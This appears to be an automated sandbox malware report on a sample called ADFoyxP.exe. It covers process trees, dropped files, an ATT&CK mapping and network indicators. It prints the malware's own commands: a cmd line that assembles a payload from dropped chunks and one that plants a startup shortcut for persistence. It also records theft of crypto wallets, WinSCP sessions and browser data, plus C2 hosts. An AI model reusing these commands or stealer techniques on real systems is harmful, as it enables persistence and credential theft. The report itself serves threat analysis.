Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\maintains.pub + ..\legislation.pub + ..\blood.pub + ..\document.pub + ..\breaks.pub + ..\both.pub + ..\explicitly.pub + ..\governor.pub + ..\bull.pub + ..\comparison.pub + ..\performing.pub + ..\gate.pub + ..\republican.pub + ..\reverse.pub + ..\thousand.pub + ..\apartments.pub + ..\swingers.pub + ..\urban.pub + ..\robert.pub + ..\regulation.pub + ..\confusion.pub + ..\listening.pub + ..\generating.pub + ..\argentina.pub + ..\amenities.pub + ..\vacation.pub + ..\vampire.pub + ..\trademarks.pub + ..\distinguished.pub + ..\silly.pub + ..\hell.pub + ..\worcester.pub + ..\concept.pub + ..\enlarge.pub + ..\preference.pub + ..\poem.pub m
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradesecure innovations\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exit
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_008114AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,23_2_008114AE
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00811FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,23_2_00811FB0
Source: Seat.com, 0000000E.00000003.942989179.000000000468C000.00000004.00000800.00020000.00000000.sdmp, Seat.com, 0000000E.00000000.932835393.0000000000473000.00000002.00000001.01000000.00000007.sdmp, TradeHub.com, 00000017.00000002.975504925.0000000000873000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: TradeHub.com | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007D0A08 cpuid 23_2_007D0A08
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_0080E5F4 GetLocalTime,23_2_0080E5F4
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_0080E652 GetUserNameW,23_2_0080E652
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007EBCD2 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,23_2_007EBCD2
Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kzpbmws1.default
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ol7uiqa8.default-release
Source: TradeHub.com | Binary or memory string: WIN_81
Source: TradeHub.com | Binary or memory string: WIN_XP
Source: TradeHub.com, 00000019.00000000.1076426037.0000000000873000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: TradeHub.com | Binary or memory string: WIN_XPe
Source: TradeHub.com | Binary or memory string: WIN_VISTA
Source: TradeHub.com | Binary or memory string: WIN_7
Source: TradeHub.com | Binary or memory string: WIN_8
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00832263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,23_2_00832263
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00831C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,23_2_00831C61
MITRE ATT&CK matrix columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information111
Scripting
2
Valid Accounts
231
Windows Management Instrumentation
111
Scripting
1
Exploitation for Privilege Escalation
11
Disable or Modify Tools
1
OS Credential Dumping
2
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
21
Input Capture
1
Network Service Discovery
Remote Desktop Protocol1
Data from Local System
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
1
Extra Window Memory Injection
2
Obfuscated Files or Information
1
Credentials in Registry
1
Account Discovery
SMB/Windows Admin Shares21
Input Capture
1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
2
Valid Accounts
1
Software Packing
NTDS3
File and Directory Discovery
Distributed Component Object Model3
Clipboard Data
3
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts2
PowerShell
2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
LSA Secrets410
System Information Discovery
SSHKeylogging4
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts512
Process Injection
1
Extra Window Memory Injection
Cached Domain Credentials1
Query Registry
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Scheduled Task/Job
113
Masquerading
DCSync251
Security Software Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
Registry Run Keys / Startup Folder
2
Valid Accounts
Proc Filesystem161
Virtualization/Sandbox Evasion
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt161
Virtualization/Sandbox Evasion
/etc/passwd and /etc/shadow5
Process Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
Access Token Manipulation
Network Sniffing11
Application Window Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd512
Process Injection
Input Capture1
System Owner/User Discovery
Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1631942 | Sample: ADFoyxP.exe | Start date: 07/03/2025 | Architecture: WINDOWS | Score: 100

Start node
  DNS/IP: ZuYwLYOGpsYmohRivNRzySjfrEDfR.ZuYwLYOGpsYmohRivNRzySjfrEDfR; www-msn-com.a-0003.a-msedge.net; 17 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Sigma detected: Search for Antivirus process; 7 other signatures
  Started: ADFoyxP.exe (53 files); msedge.exe; wscript.exe (1 file); wscript.exe

ADFoyxP.exe
  Dropped: C:\Users\user\AppData\Local\...\Worcester.pub (data); C:\Users\user\AppData\Local\...\Vampire.pub (data); C:\Users\user\AppData\Local\...\Vacation.pub (data); 34 other malicious files
  Signatures: Writes many files with high entropy
  Started: cmd.exe (2 files)

msedge.exe
  Signatures: Maps a DLL or memory area into another process
  Started: msedge.exe; identity_helper.exe; identity_helper.exe
  msedge.exe (child) DNS/IP: 13.107.42.14:443 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); 13.89.178.26:443 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); 20 other IPs or domains

wscript.exe (both instances)
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Started: TradeHub.com

cmd.exe (from ADFoyxP.exe)
  Dropped: C:\Users\user\AppData\Local\Temp\...\Seat.com (PE32)
  Signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy; Drops PE files with a suspicious file extension; 2 other signatures
  Started: Seat.com (5 files); cmd.exe (2 files, dropped C:\Users\user\AppData\Local\Temp\353090\m, data); cmd.exe (1 file); 10 other processes

Seat.com
  Dropped: C:\Users\user\AppData\Local\...\TradeHub.com (PE32); C:\Users\user\AppData\Local\...\RegAsm.exe (PE32); C:\Users\user\AppData\Local\...\TradeHub.js (ASCII); C:\Users\user\AppData\Local\...\F (data)
  Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Writes many files with high entropy; Injects a PE file into a foreign processes
  Started: RegAsm.exe; cmd.exe (2 files, dropped C:\Users\user\AppData\...\TradeHub.url, MS; started conhost.exe); cmd.exe (1 file; started conhost.exe and schtasks.exe)

RegAsm.exe
  DNS/IP: 45.95.18.173:4449 (SHOCK-1US, Netherlands)
  Dropped: C:\Users\user\AppData\Local\...\curcuma.exe (PE32+); C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506 (Microsoft)
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Writes many files with high entropy; Queries memory information (via WMI often done to detect virtual machines)
  Started: cmd.exe (Suspicious powershell command line found; started powershell.exe and conhost.exe)

powershell.exe
  Started: curcuma.exe

curcuma.exe
  DNS/IP: elevated-outcomes.shop 104.21.96.1:443 (CLOUDFLARENETUS, United States)
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found strings related to Crypto-Mining; Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
  Started: chrome.exe; msedge.exe

chrome.exe (from curcuma.exe)
  DNS/IP: 192.168.11.20 ports 137, 138, 1900 (unknown); 192.168.11.10 (unknown); 239.255.255.250:1900 (Reserved)
  Started: chrome.exe, which contacted www.google.com 142.250.191.36:443 (GOOGLEUS, United States)

msedge.exe (from curcuma.exe)
  Started: msedge.exe
